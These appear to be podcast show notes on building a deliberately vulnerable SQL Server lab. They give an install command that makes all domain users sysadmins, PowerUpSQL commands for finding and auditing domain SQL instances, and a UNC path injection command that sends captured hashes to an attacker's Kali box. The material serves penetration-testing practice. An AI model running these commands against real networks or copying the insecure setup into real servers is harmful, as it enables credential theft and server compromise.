7MS #567: How to Build an Intentionally Vulnerable SQL Server
Hey friends, today we're talking about building an intentionally vulnerable SQL server, and here are the key URLs/commands talked about in the episode:
-
Download SQL Server here
-
Install SQL via config .ini file
-
Or, install SQL via pure command line
-
Deploy SQL with a service account while also starting TCP/IP and named pipes automagically:
setup.exe /Q /IACCEPTSQLSERVERLICENSETERMS /ACTION="install" /FEATURES=SQL /INSTANCENAME=MSSQLSERVER /TCPENABLED=1 /NPENABLED=1 /SQLSVCACCOUNT="YOURDOMAIN\YOUR-SERVICE-ACCOUNT" /SQLSVCPASSWORD="YOUR PASSWORD" /SQLSYSADMINACCOUNTS="YOURDOMAIN\administrator" "YOURDOMAIN\domain users"
- Run PowerUpSQL to find vulnerable SQL servers:
$Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -like "Accessible"}
- Audit the discovered SQL servers:
Get-SQLInstanceDomain -verbose | invoke-sqlaudit -verbose
- Fire off stored procedures to catch hashes!
Invoke-SQLUncPathInjection -verbose -captureIP IP.OF-YOUR.KALI.BOX